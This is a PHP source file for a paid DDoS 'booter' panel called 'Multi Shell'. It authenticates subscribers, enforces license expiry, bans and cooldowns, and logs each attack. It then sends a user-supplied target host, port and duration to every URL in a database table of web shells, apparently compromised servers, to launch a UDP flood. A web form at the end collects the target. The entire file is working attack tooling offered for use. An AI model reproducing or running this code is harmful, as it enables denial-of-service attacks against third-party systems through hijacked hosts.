Untitled

<?php
 /***************************************************
 **** ========================================== ****
 ****                Multi Shell!                ****
 ****               Coding by Orgy               ****
 ****        Nice Looking Code? Of course        ****
 ****  Because there's beauty in the breakdown.  ****
 **** ========================================== ****
 ***************************************************/
/*
Following code is to authorize someone's acccount before sending the shells
*/
 if((isset($_GET['host'])) and (isset($_GET['port'])) and (isset($_GET['time'])) and (isset($_GET['username'])) and (isset($_GET['password']))){
	include "config.php";
	$link = mysql_connect($location,$databaseuser,$databasepass);
	@mysql_select_db($database) or die( "Unable to select database"); //Connects to database
	$username = $_GET['username']; //gets username from url
	$password = $_GET['password']; //gets password from url
	$username = stripslashes($username); //MySQL Injection Protection
	$username = mysql_real_escape_string($username); //MySQL Injection Protection
	$password = stripslashes($password); //MySQL Injection Protection
	$password = mysql_real_escape_string($password); //MySQL Injection Protection
if(isset($_GET['web'])){
	$password = md5($password);
}
if($username==""){ //if username is blank, then show the blank username error
echo $blankuser;
}elseif($password=="da39a3ee5e6b4b0d3255bfef95601890afd80709"){ //if password is blank, then show the blank password error
echo $blankpass;
}else{
$sql="SELECT * FROM Users WHERE username='$username' and password='$password'"; //tries logging in
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){ //goes here if logged in successfully


$banreasondata = mysql_query("SELECT CustomReason FROM Users WHERE username='$username' AND password='$password'");
while($banreasoninfo = mysql_fetch_assoc($banreasondata)) { //gets the data of the custom ban message
$banreason = $banreasoninfo["CustomReason"]; //gets the result
}

$banneduntil = mysql_query("SELECT BannedUntil FROM Users WHERE username='$username' AND password='$password'");
while($banneduntill = mysql_fetch_assoc($banneduntil)) { //gets the data of the custom ban message
$banned = $banneduntill["BannedUntil"]; //gets the result
}

$ban = strtotime($banned);
if($ban > time()){
?>
<html>
<center>
<?PHP
echo "You have been banned until: " . $banned . "<br/>For: " . $banreason;
die();
?>
</html>
</center>
<?PHP
}

$expires = mysql_query("SELECT Expires FROM Users WHERE username='$username' AND password='$password'");
while($expiresdata = mysql_fetch_assoc($expires)) { //gets data to see expiration date of user
$dateexpired = $expiresdata["Expires"]; //gets the expired date
}


$blacklistdata = mysql_query("SELECT Blacklisted FROM Users WHERE username='$username' AND password='$password'");
while($blacklist = mysql_fetch_assoc($blacklistdata)) { //gets data to see if user is blacklisted
$blacklisted = $blacklist["Blacklisted"]; //gets the result
}
$blacklisted = strtolower($blacklisted);
$today = time(); //gets today's date
$expiration_date = strtotime($dateexpired);
if($expiration_date > $today){ //if your not expired then
if($blacklisted=="yes"){ //if your blacklisted then
echo $blacklistedmessage . $banreason; //showing blacklisted/banned message
die();
}
}else{ //your expired
if($blacklisted=="yes"){ //are you expired and black listed?
echo $licenseexpired . "\n" . $blacklistedmessage . $banreason; //shows licensed expired and ban message
die();
}else{ //Your licensed expired, but your not banned
echo $licenseexpired;
die();
}
}
}else{
echo "<center>Wrong info!</center>";
die();
}
}
$host = $_GET['host'];  									//Set the host GET to an easier to use variable
	$port = $_GET['port'];  									//Set the port GET to an easier to use variable
	$time = $_GET['time'];										//Set the time GET to an easier to use variable
	$host = stripslashes($host); //MySQL Injection Protection
	$host = mysql_real_escape_string($host); //MySQL Injection Protection
	$port = stripslashes($port); //MySQL Injection Protection
	$port = mysql_real_escape_string($port); //MySQL Injection Protection
	$time = stripslashes($time); //MySQL Injection Protection
	$time = mysql_real_escape_string($time); //MySQL Injection Protection
$date = date('Y-m-d H:i:s', time());


$lastbooted = mysql_query("SELECT LastBoot FROM Users WHERE username='$username' AND password='$password'");
while($lastboots = mysql_fetch_assoc($lastbooted)) { //gets data to see expiration date of user
$lastboot = strtotime($lastboots["LastBoot"]); //gets the expired date
}
$timenow = time() - 60;
if($lastboot > $timenow){
$timeleft = $lastboot - time() + 60;
echo "Sorry, but you cant boot for another " . $timeleft . " second(s).";
die();
}
		mysql_query("INSERT INTO Boot_Log (User, Password, IP_Booted, Port, Date, Time_Booted)
VALUES ('$username', '$password', '$host', '$port', '$date', '$time')");
mysql_query("UPDATE Users SET LastBoot = '$date'
WHERE UserName = '$username' AND Password = '$password'");
	mysql_close($link);
	include_once("db.php"); 									//Include the database connection
	$fullcurl = "?host=".$host."&time=".$time."&port=".$port;   //GET data for the cURL handler
	ignore_user_abort(TRUE); 									//Let the page be exited and the script continue
    $SQL = mysql_query("SELECT url FROM shells");				//Select the shells
    $mh = curl_multi_init();									//Initialize the multi_handle
    $handles = array();											//Create an array for the handles

    while($resultSet = mysql_fetch_array($SQL)){         		//While fetching the rows
            $ch = curl_init($resultSet['url'] . $fullcurl); 	//Load the urls and send GET data
            curl_setopt($ch, CURLOPT_TIMEOUT, 10);          	//Only load it for 10 seconds (Long enough to send the data, can reduce this if your server is more powerful)
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 	//Don't echo the contents of the cURL shit
            curl_multi_add_handle($mh, $ch);					//Add the handles to the multi_handle
            $handles[] = $ch;									//Load the array into a handle
    }

    $running = null;											// Create a status variable so we know when exec is done.
    do { 														//execute the handles
      curl_multi_exec($mh,$running);      						// Call exec.  This call is non-blocking, meaning it works in the background.
      usleep(200000); 											// Sleep while it's executing.  You could do other work here, if you have any.
    } while ($running > 0);										// Keep going until it's done.

    foreach($handles as $ch)									// For loop to remove (close) the regular handles.
    {
      curl_multi_remove_handle($mh, $ch);						// Remove the current array handle.
    }
    curl_multi_close($mh);										// Close the multi handle

			echo "Successfully sent to all shells";				//Successful. Tell the client to start the timer if you want to implement that
if(!isset($_GET['web'])){
die();
}
		}
		?>

<html>
<body>
<center>

<?php
/*
 *Ignore how shitty this code is.
 *I absolutely HATE HTML.
 *It's functional. So yeah.
 *If you need it secured better
 *Which you shouldn't if you keep it private
 *But if you do
 *You can pay me.
 *And I'll do it
 */
 include("top.php");
 echo '<br><b>UDP Flood</b><br>
            <form action=? method=GET>
            <input type="hidden" name="action" value="boot">
            <input type="hidden" name="web" value="1">
            Username: <br><input type=text name=username value=><br>
			Password: <br><input type=password name=password value=><br>
			Host: <br><input type=text name=host value=><br>
            Length (seconds): <br><input type=text name=time value=><br>
			Port (rand for random) : <br><input type=text name=port value=rand><br>
            <input type=submit value=Go></form>';
?>
</center>
</body>
</html>